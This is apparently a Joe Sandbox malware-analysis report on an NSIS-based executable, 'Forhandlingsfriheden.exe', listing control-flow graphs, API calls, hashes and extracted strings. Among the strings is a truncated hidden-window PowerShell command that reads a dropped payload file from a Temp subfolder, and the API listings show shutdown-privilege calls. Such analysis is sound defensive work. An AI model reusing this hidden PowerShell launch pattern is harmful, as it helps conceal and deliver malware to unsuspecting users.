                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 12 403603 5->12 7 40360f-403623 call 4068c5 lstrlenA 6->7 13 403625-403641 call 406935 * 3 7->13 12->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 26 40364b 21->26 26->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 39 4036f0-4036f5 36->39 40 4036f6-4036fa 36->40 44 403860-40387a DeleteFileW call 4030a2 37->44 45 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->45 39->40 42 403700-403706 40->42 43 4037bb-4037ca call 405e3d 40->43 47 403720-403759 42->47 48 403708-40370f 42->48 43->32 61 4037cc-4037cd 43->61 66 403880-403886 44->66 67 403a67-403a77 call 403b39 OleUninitialize 44->67 45->44 64 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 45->64 49 403776-4037b0 47->49 50 40375b-403760 47->50 54 403711-403714 48->54 55 403716 48->55 58 4037b2-4037b6 49->58 59 4037b8-4037ba 49->59 50->49 56 403762-40376a 50->56 54->47 54->55 55->47 62 403771 56->62 63 40376c-40376f 56->63 58->59 65 4037dc-4037e9 call 406541 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 40388c-403897 call 405e3d 66->70 71 40391f-403926 call 403c13 66->71 78 403a79-403a89 call 405ba1 ExitProcess 67->78 79 403a9d-403aa3 67->79 81 4038e5-4038ef 70->81 82 403899-4038ce 70->82 77 40392b-40392f 71->77 77->67 83 403b21-403b29 79->83 84 403aa5-403abb GetCurrentProcess OpenProcessToken 79->84 89 4038f1-4038ff call 405f18 81->89 90 403934-40395a call 405b0c lstrlenW call 406541 81->90 86 4038d0-4038d4 82->86 91 403b2b 83->91 92 403b2f-403b33 ExitProcess 83->92 87 403af1-403aff call 406935 84->87 88 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 84->88 94 4038d6-4038db 86->94 95 4038dd-4038e1 86->95 104 403b01-403b0b 87->104 105 403b0d-403b18 ExitWindowsEx 87->105 88->87 89->67 106 403905-40391b call 406541 * 2 89->106 110 40396b-403983 90->110 111 40395c-403966 call 406541 90->111 91->92 94->95 99 4038e3 94->99 95->86 95->99 99->81 104->105 108 403b1a-403b1c call 40140b 104->108 105->83 105->108 106->71 108->83 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 126 4039c9-4039cb 122->126 123->126 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 126->128 129 4039cd-4039d7 GetFileAttributesW 126->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 130 4039f8-403a03 129->130 131 4039d9-4039e2 DeleteFileW 129->131 130->116 134 403a05 130->134 131->130 133 4039e4-4039f6 call 405c4d 131->133 133->118 133->130 134->67 137->67 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 0040353F
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                            • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                            • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                            • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",00000020,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Forhandlingsfriheden.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                            • wsprintfW.USER32 ref: 0040399B
                                                                            • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                                            • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                                              • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                            • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                              • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                              • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                              • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                              • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                            • ExitProcess.KERNEL32 ref: 00403A89
                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                            • ExitProcess.KERNEL32 ref: 00403B33
                                                                              • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\Forhandlingsfriheden.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bidragspligtige132$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Vibss=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Bi$~nsu%X.tmp
                                                                            • API String ID: 1813718867-2924138375
                                                                            • Opcode ID: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                            • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                            • Opcode Fuzzy Hash: 9f65d0021fa33c3354d42538bbc8dc08c63897f5b3407e021a3db38cc4d3dfe0
                                                                            • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 174 40580b-40580e 152->174 175 4057ef-405809 SendMessageW * 2 152->175 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 163 405917-40591d 158->163 164 40596b-40596f 158->164 161 405930-405939 call 404527 159->161 162 4058f7-405906 ShowWindow * 2 call 4044f5 159->162 171 40593e-405942 161->171 162->158 169 405945-405955 ShowWindow 163->169 170 40591f-40592b call 404499 163->170 164->161 167 405971-405977 164->167 167->161 176 405979-40598c SendMessageW 167->176 172 405965-405966 call 404499 169->172 173 405957-405960 call 4055c6 169->173 170->161 172->164 173->172 180 405810-40581c SendMessageW 174->180 181 40581e-405835 call 4044c0 174->181 175->174 182 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 176->182 183 405a8e-405a90 176->183 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188 4059d2-4059e7 TrackPopupMenu 182->188 189 4059bf-4059cf GetWindowRect 182->189 183->171 188->183 193 4059ed-405a04 188->193 189->188 194 40585a 190->194 195 40584d-405858 ShowWindow 190->195 191->183 192 405892-4058aa SendMessageW * 2 191->192 192->183 196 405a09-405a24 SendMessageW 193->196 197 405860-405866 call 4044f5 194->197 195->197 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->183
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                            • GetClientRect.USER32(?,?), ref: 004057AF
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                              • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                            • ShowWindow.USER32(00000000), ref: 004058FE
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                            • ShowWindow.USER32(00000008), ref: 0040594D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                            • CreatePopupMenu.USER32 ref: 00405992
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                            • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                            • EmptyClipboard.USER32 ref: 00405A2D
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                            • CloseClipboard.USER32 ref: 00405A88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                            • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                            • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                            • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 667 406c5f-406c64 668 406cd5-406cf3 667->668 669 406c66-406c95 667->669 670 4072cb-4072e0 668->670 671 406c97-406c9a 669->671 672 406c9c-406ca0 669->672 675 4072e2-4072f8 670->675 676 4072fa-407310 670->676 677 406cac-406caf 671->677 673 406ca2-406ca6 672->673 674 406ca8 672->674 673->677 674->677 678 407313-40731a 675->678 676->678 679 406cb1-406cba 677->679 680 406ccd-406cd0 677->680 684 407341-40734d 678->684 685 40731c-407320 678->685 681 406cbc 679->681 682 406cbf-406ccb 679->682 683 406ea2-406ec0 680->683 681->682 688 406d35-406d63 682->688 686 406ec2-406ed6 683->686 687 406ed8-406eea 683->687 694 406ae3-406aec 684->694 689 407326-40733e 685->689 690 4074cf-4074d9 685->690 692 406eed-406ef7 686->692 687->692 695 406d65-406d7d 688->695 696 406d7f-406d99 688->696 689->684 693 4074e5-4074f8 690->693 698 406ef9 692->698 699 406e9a-406ea0 692->699 697 4074fd-407501 693->697 700 406af2 694->700 701 4074fa 694->701 702 406d9c-406da6 695->702 696->702 721 407481-40748b 698->721 722 406e7f-406e97 698->722 699->683 710 406e3e-406e48 699->710 706 406af9-406afd 700->706 707 406c39-406c5a 700->707 708 406b9e-406ba2 700->708 709 406c0e-406c12 700->709 701->697 703 406dac 702->703 704 406d1d-406d23 702->704 727 406d02-406d1a 703->727 728 407469-407473 703->728 717 406dd6-406ddc 704->717 718 406d29-406d2f 704->718 706->693 714 406b03-406b10 706->714 707->670 712 406ba8-406bc1 708->712 713 40744e-407458 708->713 715 406c18-406c2c 709->715 716 40745d-407467 709->716 719 40748d-407497 710->719 720 406e4e-407017 710->720 723 406bc4-406bc8 712->723 713->693 714->701 726 406b16-406b5c 714->726 729 406c2f-406c37 715->729 716->693 724 406e3a 717->724 725 406dde-406dfc 717->725 718->688 718->724 719->693 720->694 721->693 722->699 723->708 731 406bca-406bd0 723->731 724->710 732 406e14-406e26 725->732 733 406dfe-406e12 725->733 734 406b84-406b86 726->734 735 406b5e-406b62 726->735 727->704 728->693 729->707 729->709 736 406bd2-406bd9 731->736 737 406bfa-406c0c 731->737 738 406e29-406e33 732->738 733->738 741 406b94-406b9c 734->741 742 406b88-406b92 734->742 739 406b64-406b67 GlobalFree 735->739 740 406b6d-406b7b GlobalAlloc 735->740 743 406be4-406bf4 GlobalAlloc 736->743 744 406bdb-406bde GlobalFree 736->744 737->729 738->717 745 406e35 738->745 739->740 740->701 746 406b81 740->746 741->723 742->741 742->742 743->701 743->737 744->743 748 407475-40747f 745->748 749 406dbb-406dd3 745->749 746->734 748->693 749->717
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                            • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                            • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                            • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 786 40689e-4068b2 FindFirstFileW 787 4068b4-4068bd FindClose 786->787 788 4068bf 786->788 789 4068c1-4068c2 787->789 788->789
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                            • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2132960349.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2132943262.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2132978456.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133016930.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2133247961.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Forhandlingsfriheden.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: X_B
                                                                            • API String ID: 2295610775-941606717
                                                                            • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                            • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                            • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                            • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 208 403ff0-403ffd SetWindowPos 205->208 209 404003-40400a 205->209 211 4041ed-4041f2 call 40450c 206->211 212 4041af-4041b2 206->212 207->206 208->209 214 40400c-404026 ShowWindow 209->214 215 40404e-404054 209->215 220 4041f7-404212 211->220 217 4041b4-4041bf call 401389 212->217 218 4041e5-4041e7 212->218 221 404127-404135 call 404527 214->221 222 40402c-40403f GetWindowLongW 214->222 223 404056-404068 DestroyWindow 215->223 224 40406d-404070 215->224 217->218 243 4041c1-4041e0 SendMessageW 217->243 218->211 219 40448d 218->219 231 40448f-404496 219->231 228 404214-404216 call 40140b 220->228 229 40421b-404221 220->229 221->231 222->221 230 404045-404048 ShowWindow 222->230 232 40446a-404470 223->232 234 404072-40407e SetWindowLongW 224->234 235 404083-404089 224->235 228->229 240 404227-404232 229->240 241 40444b-404464 DestroyWindow EndDialog 229->241 230->215 232->219 239 404472-404478 232->239 234->231 235->221 242 40408f-40409e GetDlgItem 235->242 239->219 244 40447a-404483 ShowWindow 239->244 240->241 245 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 240->245 241->232 246 4040a0-4040b7 SendMessageW IsWindowEnabled 242->246 247 4040bd-4040c0 242->247 243->231 244->219 274 404287-40428c 245->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 245->275 246->219 246->247 249 4040c2-4040c3 247->249 250 4040c5-4040c8 247->250 251 4040f3-4040f8 call 404499 249->251 252 4040d6-4040db 250->252 253 4040ca-4040d0 250->253 251->221 255 404111-404121 SendMessageW 252->255 257 4040dd-4040e3 252->257 253->255 256 4040d2-4040d4 253->256 255->221 256->251 260 4040e5-4040eb call 40140b 257->260 261 4040fa-404103 call 40140b 257->261 270 4040f1 260->270 261->221 271 404105-40410f 261->271 270->251 271->270 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->220 294 404360-404362 283->294 